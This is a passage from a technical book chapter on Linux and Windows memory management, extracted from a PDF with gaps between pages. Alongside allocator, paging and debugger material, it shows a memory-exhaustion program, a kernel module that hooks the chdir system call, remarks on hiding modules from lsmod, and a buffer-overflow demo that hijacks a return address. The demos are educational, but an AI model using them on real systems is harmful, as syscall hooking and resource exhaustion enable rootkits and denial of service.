PG_locked field, is used to indicate if a page is locked.
#define PG_locked 0 /* Page is locked. Don't touch. */
Memory Allocation
When Linux boots, the kernel reserves a region of physical memory
to store its code and data structures. The pages of memory that
constitute this region are locked and cannot be written to disk. The
Memory Management Policies 77
Chapter 2
as dynamic memory. Figure 2.11 displays this basic organization of
physical memory.
Figure 2.11
Figure 2.12
The kernel can allocate dynamic memory for itself by invoking one
of three functions:
n unsigned long __get_free_pages(unsigned int
gfp_mask, unsigned int order);
n void * kmalloc (size_t size, int flags);
n static inline void * vmalloc (unsigned long size);
The __get_free_pages() function is defined in /usr/src/
linux/mm/page_alloc.c. It uses the buddy system algorithm
to allocate 2order pages of contiguous memory. The gfp_mask dic-
tates how the free pages will be looked for. For example, if
gfp_mask is set to __GFP_HIGH, the priority of the memory
request is set to the highest level. There are a whole set of
gfp_mask values in /usr/src/linux/include/linux
/mm.h.
The kmalloc() function is defined in /usr/src/linux
/mm/slab.c and allocates size number of bytes. Instead of a
buddy system algorithm, it uses an approach similar to the slab allo-
cator designed by Sun Microsystems in 1994. The kmalloc()
Memory Management Policies 79
Chapter 2
the sys_fork() system call is made. The sys_fork() function
causes a process address space to be requisitioned from memory for
the user program. A process address space consists of a set of mem-
ory regions in the computer’s linear address space. Each region is a
contiguous set of linear addresses and is assigned a set of access
rights. The size of each memory region is a multiple of 4KB.
Linux user applications traditionally have four memory regions.
One is used to store the application’s machine code, one is used to
store the application’s data, another serves as a stack, and the
fourth region is used as a heap to provide space for run-time storage
requests. The arrangement of these regions in the linear address
space is a function of the development tools that were used to build
the application and operating system’s program loader. For example,
Figure 2.13 displays two different ways to organize memory
regions.
Figure 2.13
unsigned dumpable:1;
/* Architecture-specific MM context */
mm_context_t context;
};
The vm_area_struct structure describes a given memory
region. Because a process address space usually consists of several
memory regions, the mm_struct process address space descriptor
will need to keep a list of vm_area_struct variables. This is
what the mmap member variable is for.
The pgd member variable points to the page global directory
allocated to a process address space. Each process in Linux owns a
single page global directory, and this points to one or more page
tables. Each process also has its own CR3 value. This register’s
contents are saved in the task’s TSS when its corresponding task is
suspended.
Memory Management Policies 81
Chapter 2
run-time stack is specified by the arg_start and arg_end mem-
ber variables.
Memory Usage
For a system-wide summary of memory usage, use the free
command:
# free
total used free shared buffers cached
Mem: 62200 58916 3284 864 2692 17688
-/+ buffers/cache: 38536 23664
Swap: 96380 9480 86900
Total: 158580 68396 90184
Mem and swap are simply physical memory and disk swap space.
Linux tends to keep things simple, and this is part of its appeal to
me. The data displayed by free is actually an abbreviated version
of what you would get by looking in the kernel’s /proc directory:
# cat /proc/meminfo
total: used: free: shared: buffers: cached:
Mem: 63692800 39899136 23793664 1110016 6172672 15433728
Swap: 98693120 39428096 59265024
MemTotal: 62200 kB
MemFree: 23236 kB
MemShared: 1084 kB
Buffers: 6028 kB
Cached: 8972 kB
SwapCached: 6100 kB
Active: 10664 kB
Inact_dirty: 11208 kB
Inact_clean: 312 kB
Inact_target: 1780 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 62200 kB
LowFree: 23236 kB
SwapTotal: 96380 kB
SwapFree: 57876 kB
NrSwapPages: 14469 pages
82 Chapter 2
#include <stdio.h>
void main()
{
Chapter 2
unsigned long i;
unsigned long j;
char ch;
unsigned char *ptr;
for(i=0;i<0xFFFFFFFF;i++)
{
printf("malloc(%lu)\n",i);
ptr = malloc(0x100000);
for(j=0;j<0x100000;j++){ ptr[j]=0x7; }
printf("press [enter] key\n");
scanf("%c",&ch);
}
return;
}
The machine I tested this code on had 64MB of DRAM. At about
110MB of allocated virtual memory, my computer’s paging subsys-
tem began to thrash. A few moments later, I lost control of my
machine; I couldn’t even gain the attention of a terminal console to
kill the process. I literally had to unplug my computer. A more insid-
ious version of this program would sleep at odd intervals and only
allocate small bits of memory. This kind of attack tends to creep up
on systems that aren’t being monitored carefully.
Next, I tried the more audacious approach of directly assaulting
the kernel:
/* --brute.c-- */
void main()
{
unsigned char *ptr;
ptr = 0xC00000000;
*ptr ='a';
return;
}
Here is the console output that I received:
[root@localhost root]# cc -o brute brute.c
84 Chapter 2
NOTE Once an LKM has been merged with the kernel’s image, the
LKM’s code is a DOS-like situation where the operating system is
naked. In this state, we can write to any device files we want. This
includes /dev/kmem, the kernel’s coveted memory image. We can
also modify the /proc file system or perhaps hook an internal kernel
function. The potential number of uses is almost infinite. Ba ha ha ha
ha (evil laugh).
LKMs can be loaded/inserted into the kernel at run time with the
following command:
[root@localhost root]# insmod lkm.o
Memory Management Policies 85
Chapter 2
[root@localhost root]# lsmod
Module Size Used by
lkm 880 0 (unused)
ide-cd 27072 0 (autoclean)
cdrom 28512 0 (autoclean) [ide-cd]
soundcore 4464 0 (autoclean)
binfmt_misc 6416 1
tulip 39232 1
ds 7056 2
yenta_socket 9488 2
pcmcia_core 41600 0 [ds yenta_socket]
autofs 11520 0 (autoclean) (unused)
appletalk 20912 0 (autoclean)
ipx 16448 0 (autoclean)
mousedev 4448 1
hid 19024 0 (unused)
input 3840 0 [mousedev hid]
usb-uhci 21536 0 (unused)
usbcore 51712 1 [hid usb-uhci]
ext3 64624 1
jbd 40992 1 [ext3]
Equivalent results can be obtained via:
[root@localhost root]# cat /proc/modules.
This will provide you with a list of currently loaded modules. Natu-
rally, some modules can be written so that they modify the kernel
and are not listed (just a thought). Ba ha ha ha (Neumann laugh).
To remove an LKM from the kernel’s image, you can use the
rmmod command:
[root@localhost root]# rmmod lkm
Note how I did not include the .o suffix as I did with insmod. The
rmmod command will cause the LKM’s cleanup_module()
function to be invoked. You should use this as an opportunity to
restore the system to its previous state.
86 Chapter 2
my_tty = current->tty;
if (my_tty != NULL)
{
(*(my_tty->driver).write)(my_tty,0,str,strlen(str));
(*(my_tty->driver).write)(my_tty,0,"\015\012",2);
}
return;
}
uid = getuid_call();
sprintf((const char*)uid_str,"%d",uid);
printStr((const char*)uid_str);
Chapter 2
printStr(dir);
return saved_call(dir);
}
int init_module()
{
printStr("init_module()-start");
saved_call = sys_call_table[__NR_chdir];
sys_call_table[__NR_chdir] = my_call;
getuid_call = sys_call_table[__NR_getuid];
printStr("init_module()-end");
return(0);
}
void cleanup_module()
{
printStr("cleanup()-start");
sys_call_table[__NR_chdir] = saved_call;
printStr("cleanup()-end");
return;
}
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void hijacked()
{
printf("\tYou've been hijacked!\n");
exit(0);
return;
}
void main()
{
Memory Management Policies 89
printf("bigbuff = %s\n",bigbuff);
fptr = hijacked;
lptr = (unsigned long*)(&bigbuff[8]);
Chapter 2
*lptr = (unsigned long)fptr;
printf("In main()\n");
overflow(bigbuff);
printf("Back in main()\n");
return;
}
When this program is run, the following output is streamed to the
console:
bigbuff = abcdefgh
In main()
You've been hijacked!
The key of this technique lies in the activation record of the function
to which you are feeding arguments. Figure 2.14 displays the nor-
mal activation record of the overflow() function.
Figure 2.14
overflow(bigbuff);
Figure 2.15
Chapter 2
anything else. The people at OpenBSD know this more than anyone
else (www.openbsd.com). Commercial vendors like Microsoft are so
busy churning out new versions that they cannot invest the time
needed to protect against these types of attacks.
In the Middle Ages, defenders of a fortress could rain arrows and
boiling oil down on attackers. These defenses were very effective,
seeing as how the aggressors typically had nowhere to hide. Having
thick walls didn’t hurt either. Likewise, Linux sysops can do a num-
ber of things to harden their production systems and make attacking
them much more expensive:
Table 2.4
Measure Benefit
Shut down unnecessary services Decrease number of potential targets
Install an intrusion detection system Detect Trojan horses and compromised
binaries
Implement a VPN Foil sniffers
Disable all dial-up servers Remove the easy path around your
firewall
Place public servers in a demilitarized Limit damage done if public boxes are
zone hacked
Disable zone transfers on DNS servers Prevent information leakage
Implement password changes/checking Prevent usage of weak and old
passwords
Log data with a dedicated syslog Save forensic evidence in the event of
machine an attack
Enable port scan detection software Preempt an attack before it happens
Disable NFS and sendmail Use SSH and qmail
Establish phone call protocols Reduce the risk of social engineering
attacks
Install a dedicated firewall (i.e., Limit/monitor network traffic to the
CheckPoint) outside
have access to source code. This is why you will probably want to
visit www.securityfocus.com and get on their bugtraq mailing list.
This gives you a way to hear about problems as they are reported.
Historical Forces
Microsoft’s DOS operating system has never really died off. I have
seen DOS 6.22 books at Barnes & Noble. In fact, you can still buy a
copy of IBM’s PC DOS. This is known as PC DOS 2000, found at
http://www3.ibm.com/software/os/dos.
Unofficially, however, the death knell of DOS was sounded when
Windows 1.0 was released on November 20, 1985. A little over two
years later, Windows 2.0 was released. Windows 2.0 ran on an Intel
80286 in protected mode. The first truly popular version of Win-
dows, 3.1, was presented to the public on April 6, 1992. It provided a
Memory Management Policies 93
Chapter 2
In August of 1995, Windows 95 was made available to the public.
It was a major facelift and was completely independent of DOS,
although it did ship with MS-DOS 7.0. Windows 95 supported
advanced features like pre-emptive multitasking and TCP/IP net-
working. Windows 95 also possessed a much more attractive user
interface. It was a smashing success. Microsoft followed Windows
95 with Windows 98, whose success was not as celebrated.
The limitation of Windows 95 and 98 was that they targeted the
average consumer. Windows 95 and 98 both ran a broad spectrum of
desktop applications, but that was about it. The memory protection
was still weak, and they had a tendency to crash, or freeze, when
multiple applications were loaded (I am a voice of experience). In
other words, neither of these operating systems was intended to
run as a business server.
In the early 1990s, Microsoft did not have an industrial-strength,
enterprise level operating system to sell, like UNIX, VMS, or
OS/390. Computers that ran the Windows operating system were
viewed by mainframe vendors as nothing more than embroidered
clients. The high-end system vendors, like IBM and HP, could turn
up their noses and smirk.
“Here’s a nickel, kid. Buy yourself a better computer.”
— UNIX Admin from “Dilbert”
Bill Gates decided that he wanted in; the potential for profit was too
much to resist. So, like any political action committee, he went out
and bought the best that money could buy. He hired Dave Cutler,
the lead architect of Digital Equipment Corporation’s (DEC) VMS
operating system. Cutler also played a pivotal role in the develop-
ment of DEC’s RSX-11 system. Many people don’t know about
Cutler, and he doesn’t get the publicity that someone like Ken
Thompson commands. Nevertheless, hiring Cutler and his small
group of engineers was the best money that Gates ever spent. In
1994, Windows NT 3.1 was released and marked the beginning of
Microsoft’s wildly profitable ascent into the server market.
94 Chapter 2
ASIDE
In 1997, I was hired by an ERP company in the Midwest. I
walked smack into the middle of a major effort to port their 16
million line, middleware code base to Windows NT 4.0. This,
in and of itself, was enough to prove to me that NT was finally
gaining attention. Porting a 16 million line code base is any-
thing but cheap. In fact, it is more like getting married: You
don’t do it unless you are willing to make a significant
long-term commitment.
There were complaints from the engineers undertaking
the port. Their primary gripe was that NT was not a multiuser
system. Microsoft, you see, was espousing a fundamentally
different network model. Instead of having everyone log into
a central machine, Microsoft wanted program components to
be spread out so that applications could take advantage of the
processing power on each machine in the network. This
new paradigm was christened the Distributed Network Archi-
tecture (DNA). It sent some UNIX developers I know into
conniptions.
Chapter 2
Figure 2.16
ASIDE
Microsoft has recently announced that it will share the source
code to its .NET tool suite with academic programs through-
out the United States. My guess is that this is a response to
the growing popularity of Linux, which is currently the sys-
tem of choice for research. UNIX gained a strong following
among universities in the 1970s, back when Bell Labs gave its
UNIX source code to computer science departments. These
same 1970s students went out into the marketplace and made
UNIX the dominant high-end player that it is today. The same
could happen with Linux, and I think this scares Microsoft.
On the other hand, what gains a stronghold at universities
does not always gain a foothold in the real world. The RISC
architecture is a darling in many academic programs, but un-
less you are looking at Apple PCs or high-end UNIX servers,
you will be stuck with CISC. CISC is not going to die no mat-
96 Chapter 2
Figure 2.17
Memory Management Policies 97
For applications that are memory intensive, like databases, there are
versions of Windows (i.e., Windows 2000 Advanced Server and Win-
dows 2000 Datacenter Server) that pack the kernel into the topmost
gigabyte of linear address space so that the applications can have
3GB of linear address space. This feature is enabled via the follow-
Chapter 2
ing sort of entry in BOOT.INI:
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows
2000 Advanced Server" /3GB
Figure 2.18
Windows is also able to take advantage of the PAE flag in CR4 that
allows 36 address lines (i.e., 64GB) to be used instead of the normal
32. Naturally, Microsoft had to invent its own acronym so you would
think they had invented it. The facility, in Windows, that allows a
32-bit application to use more than 2GB of physical memory is
known as Address Windowing Extensions (AWE). In order to take
advantage of AWE, one of the core kernel binaries has to be
replaced. Specifically, the Ntoskrnl.exe executable must be
replaced by Ntkrnlpa.exe. AWE is supported by all of the Win-
dows 2000 implementations. It is enabled by the /PAE switch in
BOOT.INI.
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows
2000 Advanced Server" /PAE
here. Both MMURTL and Linux used this same type of two-ring
scheme so that the paging facilities of the Pentium could provide the
bulk of memory management accounting work. MMURTL and
Linux also make only minimal use of segmentation, seeing as how it
is a somewhat redundant memory partitioning technology. I suspect
that Windows will also eschew an involved segmentation approach
in favor of using paging to divvy up memory. As we will see in the
following section, my suspicions were correct.
The operating system is the only real universally visible con-
struct. Applications might be isolated from each other, each one in
its own private 2GB linear address space, but they all see the oper-
ating system as occupying the bottom portion of memory. Figure
2.19 displays the most common topography of the operating sys-
tem’s components.
Figure 2.19
Some of the regions in Figure 2.19 are not exact in terms of their
starting and stopping range because some components of the oper-
ating system address space are dynamic. The really important thing
to take from Figure 2.19 is that the kernel’s machine instructions
are secluded in the basement of the operating system’s linear
address space. The remaining space is taken up by data structures
of one form or another.
Memory Management Policies 99
Chapter 2
Table 2.5
Macro Meaning
KGDT_NULL Null selector (points to vacant entry at start of GDT)
KGDT_R0_CODE Selector to kernel code segment descriptor
KGDT_R0_DATA Selector to kernel stack segment descriptor
n0 KGDT_R3_CODE Selector to user code segment descriptor
KGDT_R3_DATA Selector to user stack/data segment descriptor
KGDT_TSS Selector to segment descriptor storing the TSS
(multitasking)
KGDT_R0_PCR Selector to segment containing the Process Control Region
KGDT_R3_TEB Selector to segment containing the Thread Environment
Block
KGDT_VDM_TILE Selector to segment containing the DOS virtual machine
KGDT_LDT Selector to segment containing the LDT
a Win32 GUI program that can be used to look at both kernel mode
and user mode code. KD, Kernel Debugger, is the console equivalent
of WinDbg. KD comes in three flavors: I386KD.EXE,
ALPHAKD.EXE, and IA64KD.EXE. I am assuming that you are on
a Pentium machine, so the one you would need to use is
I386KD.EXE.
Debugging a live kernel typically requires a special setup. A tar-
get machine, which is running the kernel under scrutiny, is
connected by a NULL modem to a host machine. The kernel
debugger lives on the host machine so that it can watch the kernel
without becoming part of the action if the target machine becomes
unstable. A NULL modem is just a special kind of serial cable. This
target-host machine installation is illustrated in Figure 2.20.
Figure 2.20
If you don’t have access to a second machine, you can still use a
kernel debugger to look under the hood. However, in this case, the
kernel will be dead. Specifically, you will need to crash your Win-
dows computer so that it dumps an image of memory to disk. This
is exactly what happens when the infamous “Blue Screen of Death”
(BSOD) appears. There are several types of memory dumps that
can be performed:
n Complete memory dump
Chapter 2
n Kernel memory dump
n Small memory dump
A memory dump is the snapshot of a system when it died. A com-
plete memory dump makes sure that everything but the kitchen
sink ends up in the dump file. A kernel memory dump limits its con-
tents to the kernel code and data. The small memory dump is a
64KB file containing a minimal amount of system status
information.
To specify the type of memory dump that you want the kernel to
write to disk during a crash, open the Windows Control Panel and
double-click on the System icon. Select the Advanced tab and click
on the Startup and Recovery button. The dialog box that should
appear is displayed in Figure 2.21.
Figure 2.21
102 Chapter 2
NOTE You will need to make sure that you have the latest kernel
symbols installed on your computer. These allow the debugger to map
kernel symbols to addresses. It is important to make sure that you
have the correct version of symbols too. If your kernel is build 2195
SP 2 (Service Pack 2), you will need symbols for build 2195 SP 2.
You can determine your build and service pack number by opening
Chapter 2
the Windows Control Panel and clicking on the System icon. The panel
marked General should specify the version status of your Windows
installation. If your symbols are the wrong version or the debugger
cannot find them, the kernel debugger will display an error message
having to do with checksums or missing files. I spent several very frus-
trating hours figuring this out one particular Saturday.
Finally, you will need to set the _NT_SYMBOL_PATH environmental
variable to the directory containing your symbol files (i.e., e:\winnt\
symbols). The kernel debugger will use this variable to find the sym-
bol files at run time.
Once I had the kernel’s state loaded up, I examined the GDTR reg-
ister. This stores the base linear address and limit of the GDT. The
debugger views GDTR in terms of two smaller registers (GDTR
and GDTL). The r command is used to view the contents of
registers:
kd> r gdtr
r gdtr
gdtr=80036000
kd> r gdtl
r gdtl
gdtl=000003ff
This told me that the GDT resides at a linear address of
0x80036000 and consists of 128 64-bit GDT entries (i.e., 3FF
bytes). I used the dump command to look at the actual GDT entries:
kd> d 80036000
d 80036000
80036000 00 00 00 00 00 00 00 00-ff ff 00 00 00 9b cf 00 ................
80036010 ff ff 00 00 00 93 cf 00-ff ff 00 00 00 fb cf 00 ................
80036020 ff ff 00 00 00 f3 cf 00-ab 20 00 20 24 8b 00 80 ......... . $...
80036030 01 00 00 f0 df 93 c0 ff-ff 0f 00 00 00 f3 40 00 ..............@.
80036040 ff ff 00 04 00 f2 00 00-00 00 00 00 00 00 00 00 ................
80036050 68 00 80 34 47 89 00 80-68 00 e8 34 47 89 00 80 h..4G...h..4G...
80036060 ff ff c0 2a 02 93 00 00-ff 3f 00 80 0b 92 00 00 ...*.....?......
80036070 ff 03 00 70 ff 92 00 ff-ff ff 00 00 40 9a 00 80 ...p........@...
kd>
104 Chapter 2
After that, it was just a matter of sifting through 64-bit length strips
of memory. What I came up with was a list of 25 live segment
descriptors. The rest were vacant (i.e., the present flag was
cleared). Given that a GDT is capable of storing 8,192 64-bit entries,
Windows is only using a very small fraction of the possible total
entries.
Kernel Segment Descriptors (Privilege = 0)
--------------------------
0000 Bas=00000000 Lim=00000000 Bytes DPL=0 NP
0008 Bas=00000000 Lim=000fffff Pages DPL=0 P Code RE A
0010 Bas=00000000 Lim=000fffff Pages DPL=0 P Data RW A
0030 Bas=ffdff000 Lim=00000001 Pages DPL=0 P Data RW A
0060 Bas=00022ac0 Lim=0000ffff Bytes DPL=0 P Data RW A
0068 Bas=000b8000 Lim=00003fff Bytes DPL=0 P Data RW
0070 Bas=ffff7000 Lim=000003ff Bytes DPL=0 P Data RW
0078 Bas=80400000 Lim=0000ffff Bytes DPL=0 P Code RE
0080 Bas=80400000 Lim=0000ffff Bytes DPL=0 P Data RW
0088 Bas=00000000 Lim=00000000 Bytes DPL=0 P Data RW
00e0 Bas=f7050000 Lim=0000ffff Bytes DPL=0 P Code RE A
00e8 Bas=00000000 Lim=0000ffff Bytes DPL=0 P Data RW
00f0 Bas=8042df4c Lim=000003b7 Bytes DPL=0 P Code EO
00f8 Bas=00000000 Lim=0000ffff Bytes DPL=0 P Data RW
0100 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
0108 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
0110 Bas=f7060000 Lim=0000ffff Bytes DPL=0 P Data RW A
Chapter 2
Linear Address Space Taxonomy
The memory that constitutes the linear address space of a user
application can be classified as one of three different species:
n Free
n Reserved
n Committed
Free memory is not being used by an application. To understand
reserved and committed memory, it is helpful to use a restaurant
analogy. When you call a restaurant and reserve a table, you are not
actually sitting at the table, but you know it will be there when you
need it. Not until you walk into the restaurant and sit down have
you made a commitment to spend money.
Likewise, reserved memory is nothing more than a range of linear
addresses that has been set aside for future use. Trying to access
linear memory that is reserved produces a page fault because no
physical memory has been allocated yet. Committed memory is a
range of linear addresses for which physical storage in memory or
on disk has been allocated. This two-phase commit, to borrow a
phrase from transaction theory, allows memory to be reserved. This
approach, which delays physical memory allocation until the last
minute, belongs to a school of algorithms known as lazy evaluation.
The concepts of reserved and committed memory are reflected
in the Win32 API. Specifically, there is a function called Virtual-
Alloc() that allows memory to be reserved or committed.
Given that allocation of linear address regions consists of two
phases, it only makes sense that the freeing of linear memory is
also comprised of two phases. Linear memory is de-committed so
that the memory region has reverted to the reserved state, and then
it is released. VirtualFree() is a Win32 API function that pro-
vides this mechanism to user applications.
Consider the following example:
106 Chapter 2
#include<windows.h>
#include<stdio.h>
void main()
{
long *ptr;
unsigned long nbytes = 1024;
ptr = VirtualAlloc(NULL,nbytes,MEM_RESERVE,PAGE_READWRITE);
/*
memory is reserved: this will cause application to crash
ptr[64]='a';
*/
VirtualAlloc(ptr,nbytes,MEM_COMMIT,PAGE_READWRITE);
ptr[64]='a';
VirtualFree(ptr,nbytes,MEM_DECOMMIT);
/*
memory is reserved: this will cause application to crash
ptr[64]='a';
*/
VirtualFree(ptr,nbytes,MEM_RELEASE);
return;
}
If memory is accessed while it is in the reserved state, the applica-
tion will crash. You can re-insert the code that has been commented
out to prove this to yourself.
As with Linux, pages of memory can be locked. User programs
can use the VirtualLock() and VirtualUnlock() functions
to request that a region of linear memory is locked. However, the
kernel is free to ignore this request. The only way to guarantee
that a region of linear memory is locked is to invoke kernel mode
functions like MmLockPageableCodeSection() and MmLock-
PageableDataSection(). Unfortunately, these calls are
internal to the kernel and normally cannot be invoked from user
space.
Chapter 2
system working sets. To make efficient use of physical memory,
Windows tracks the number of pages allocated to each working set
and can expand or trim the number of page frames allotted. The
default minimum and maximum working set sizes are depicted in
Table 2.6.
Table 2.6
Physical DRAM Available Default Minimum Default Maximum
Less than 20MB 20 pages 45 pages
20-32MB 30 pages 145 pages
More than 32MB 50 pages 345 pages
ModifiedNoWrite: 0 ( 0 kb)
Active/Valid: 19109 ( 76436 kb)
Transition: 0 ( 0 kb)
Unknown: 0 ( 0 kb)
TOTAL: 32767 (131068 kb)
As you can see, there are eight different types of page states. These
types are enumerated and explained in Table 2.7.
Table 2.7
Page Frame Type Meaning
Zeroed Page is free and initialized with zero values
Free Page is free but is uninitialized (stores garbage bytes)
Standby Recently removed from a working set, and was not modified
while in the set
Modified Recently removed from a working set, and was modified
while in the set
ModifiedNowrite Like a “modified” page but will not be written to disk
Active/Valid Page is part of a current working set
Transition Page is in digital purgatory between the disk and physical
memory
Unknown Danger! danger!, bad page frame, has caused hardware
errors
Memory Protection
Given Windows’ rather minimal use of segmentation, I suspect that
page faults provide the core memory protection mechanism.
Remember that Windows has only two rings of privilege (kernel
mode and user mode). This fits perfectly with the Supervisor/User
privilege scheme that Intel paging supports. As with Linux and
MMURTL, when a user program attempts to access memory
belonging to the kernel, a page fault is generated and passed on to
Windows to do what it sees fit. Typically, this means halting the pro-
gram that caused the page fault.
The nature of the page directory and page table bookkeeping also
serves to keep one process from accessing physical memory being
used by another process. Each process in Windows is supplied with
its own page directory. This ensures that the linear address space
used by the process will map to a unique physical address space.
This is particularly important because Windows places each process
in an identical linear address space.
The additional protection supplied by the page table entry
read/write flag, discussed in Chapter 1, is reflected in the Win32
API. Take a look at the call to VirtualAlloc() that was made in
a previous example:
Memory Management Policies 109
ptr = VirtualAlloc(NULL,nbytes,MEM_RESERVE,
PAGE_READWRITE);
The last argument is a memory access specifier. This specifier can
be one of the eight macros enumerated in Table 2.8.
Table 2.8
Macro Meaning
PAGE_READONLY Page region can only be read
PAGE_READWRITE Page region can be read and written to
Chapter 2
PAGE_EXECUTE Page region can be executed
PAGE_EXECUTE_READ Page region can be read and executed
PAGE_EXECUTE_READWRITE Page region can be read, executed, and written to
PAGE_GUARD Access raises a STATUS_GUARD_PAGE exception
PAGE_NOACCESS Page region cannot be accessed
PAGE_NOCACHE Page region cannot be placed in the cache
Demand Paging
Windows uses the Present (P) flag in page table entries to support
demand paging. Windows also adds a twist to this mechanism by
loading a cluster of pages in an effort to reduce the number of page
faults that it handles. The size of the page cluster loaded depends on
the amount of physical memory available. Given that most machines
have at least 32MB of DRAM, page clusters will be either four or
eight pages in size.
As I mentioned earlier, disk I/O is an extremely expensive opera-
tion and should be avoided by whatever means necessary. Each page
fault translates into a read from the disk. Clustering is a clever way
to save execution time. It is like shopping at a wholesale food dis-
tributor to save trips to the grocery store.
When there are plenty of unoccupied page frames in physical
memory, the operating system will load disk-bound pages into these
frames when they are requested. However, things get a little more
complicated when there are no available page frames to spare. In
110 Chapter 2
this case, the operating system has to make a policy decision and
decide which pages in physical memory will be removed to make
way for the requested pages that are loaded from disk storage. How
does the operating system decide which pages to write to disk in
order to produce the necessary free space?
Once again, we are faced with a scenario that is like a game of
musical chairs.
There are a few standard algorithms, including first in, first out
(FIFO) and least recently used (LRU). The FIFO algorithm moves
pages to disk that have been in memory the longest. The LRU algo-
rithm is slightly more involved. The LRU algorithm takes into
account the number of times that a page in physical memory has
been modified. Those pages that have been modified the least are
written to disk.
Which algorithm does Windows use? This depends on the num-
ber of processors that Windows can access on the motherboard. If
Windows is running on top of a single processor, a variation of the
LRU algorithm is utilized. If Windows has multiple processors at its
disposal, it uses the FIFO algorithm. In both cases, the algorithms
are applied in the context of working sets. If a page is requested that
has been written to disk, Windows will look at the working set that
the page belongs to in order to determine which members of the
working set should be swapped to disk so that the requested page
can be loaded into memory.
Memory Allocation
When the kernel allocates physical memory for a process, it sets up
the allocated memory so that the first address (i.e., the lowest
address) is a multiple of 64KB. In other words, processes are
aligned in physical memory on a 64KB boundary. The size of the
address space reserved for a process is a multiple of the native pro-
cessor’s page size. On a Pentium, an application would be given a
plot of real estate in physical memory that is a multiple of 4KB. The
Pentium does provide facilities for larger page sizes (i.e., 4MB), but
everyone in their right mind sticks to 4KB page sizes (MMURTL,
Linux, Windows, etc.).
One of the fringe benefits of being a user process is that each
task is constructed with its own heap. Figure 2.22 displays one of
the possible memory layouts for a user process. The stack grows
down from the highest address, and the heap grows up toward the
stack.
Memory Management Policies 111
Chapter 2
Figure 2.22
#include<windows.h>
#include<stdio.h>
void main()
{
HANDLE hHeap;
unsigned char *buffer;
hHeap = GetProcessHeap();
if(hHeap==NULL){ printf("No heap!\n"); exit(1); }
112 Chapter 2
buffer = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,1024);
if(buffer==NULL){ printf("No heap space!\n"); exit(1);}
if(HeapFree(hHeap,HEAP_NO_SERIALIZE,buffer))
{
printf("have returned memory to the collective\n");
}
return;
}
When this program is run, you will see:
buffer[511]=0, buffer has been zeroed
buffer[512]=CA
have returned memory to the collective
Chapter 2
Hit Rate = 0% Hit Rate = 0%
.
.
.
Total NonPaged currently allocated for above lists = 2536
Total NonPaged potential for above lists = 4048
Total Paged currently allocated for above lists = 0
Total Paged potential for above lists = 544
kd>
If you look back at Figure 2.19, you will see that the operating sys-
tem reserves significant portions of memory for the paged and
locked memory pools/heaps. These pools vary in size, but the maxi-
mum pool sizes are hard coded in the kernel’s source code. The
paged memory pool, whose storage can be written to disk, can be at
most approximately 492MB in size. The non-paged memory pool,
which is used by device drivers that require resident memory, can
be at most 256MB in size.
The kernel’s use of its memory pools can be examined with the
Poolmon.exe program that ships with the Windows Support Tools
package. But before you do, you will need to run gflags.exe
(which also ships with the support tools) and enable pool tagging.
Pool tagging allows the kernel to assign a tag to each type of data
structure being allocated and freed within the kernel. Statistics can
then be gathered for particular data structures. The Poolmon.exe
program tracks the individual allocations that are made from the
paged and non-paged memory pools. The output is character-based,
as shown in Figure 2.23.
An explanation of the columns appearing in Figure 2.23 is pro-
vided in Table 2.9.
Table 2.9
Column Meaning
Tag Identifies a particular type of data structure
Type Source of memory: paged or non-paged pool
Allocs Number of data structure allocations made
Frees Number of data structure releases made
114 Chapter 2
Column Meaning
Diff Allocs — Frees
Bytes Total number of bytes currently used by this type of data structure
Per Alloc Number of bytes used by a single data structure of this type
Figure 2.23
Memory Usage
Memory usage can be measured on a system-wide basis or on a pro-
cess-by-process basis. System administrators tend to be concerned
with the former and developers tend to be concerned with the
latter.
The following three mechanisms can be used to track memory
usage on a system-wide basis:
n Task Manager: Performance pane
n Win32 API
n Pmon.exe
There are also a couple of tools that can be used to measure the
memory used by a process:
n Task Manager: Process pane
n Pviewer.exe
The Task Manager can be invoked by pressing the Ctrl+Alt+Del
keys simultaneously. This combination of keys is known as the
Memory Management Policies 115
Chapter 2
Figure 2.24
The Mem Usage column in the Process pane specifies the physical
memory used by a process. The Kernel Memory section on the Per-
formance pane specifies the size of the paged and non-paged kernel
memory pools.
The Win32 API has a function called GlobalMemoryStatus()
that will return the current memory usage by the system. An exam-
ple of its usage is offered in the following short program.
#include<windows.h>
#include<stdio.h>
void main()
{
MEMORYSTATUS mstatus;
GlobalMemoryStatus(&mstatus);
printf("percent of memory in use =%lu\n",
mstatus.dwMemoryLoad);
printf("bytes of physical memory =%lu\n",
mstatus.dwTotalPhys);
printf("free physical memory bytes =%lu\n",
mstatus.dwAvailPhys);
printf("max. bytes in paging file =%lu\n",
mstatus.dwTotalPageFile);
printf("free bytes in paging file=%lu\n",
mstatus.dwAvailPageFile);
printf("total bytes in user space =%lu\n",
mstatus.dwTotalVirtual);
printf("free user bytes =%lu\n",mstatus.dwAvailVirtual);
116 Chapter 2
return;
}
Pmon.exe and Pviewer.exe are both tools that are bundled with
the Windows Support Tools package. Pmon.exe offers a snapshot
of the operating system and all of its processes. The output is
dynamically updated so that the statistics provided reflect the actual
state of your computer (see Figure 2.25).
Figure 2.25
Figure 2.26
Memory Management Policies 117
Chapter 2
told me that paging on Windows imposes an average execution time
penalty of 10%.
NOTE The paging penalty can actually be even greater than 10%
given that most programs are currently larger than 88KB (the amount
of cached page relocations afforded by the look-aside cache in the
paging unit). Take a program that calls many functions. Each time you
access a function, there is a high probability that it will not be in the
cache. This really drags out execution time. The only short-term solu-
tion that I can think of is to inline code with macros.
Figure 2.27
118 Chapter 2
NOTE For those of you who were not on the scene in the early
1990s, Win32s was a special extension package that allowed 32-bit
applications to run on Windows 3.1 and Windows 3.11. It was often
bundled with development tools. I installed Win32s on my 80486 back
in 1995 as an add-on to the Borland 4.5 C++ compiler.
Universal thunking is of little use, seeing as how Windows 3.1 is, for
all intents and purposes, an extinct operating system.
Generic thunking is facilitated entirely by an API. Win32 func-
tions like LoadLibraryEx32W(), CallProc32W(), and
FreeLibrary32W() declared in WOWNT16.H allow 16-bit code to
load and invoke a 32-bit Win32 DLL. Because this mechanism is
API driven, most of the internal operation is hidden from view.
Flat thunking, however, uses a mechanism that is open to inspec-
tion, so dissecting this mechanism may offer some sort of insight.
Implementing flat thunking is a procedure that has five steps:
1. Write a thunk script.
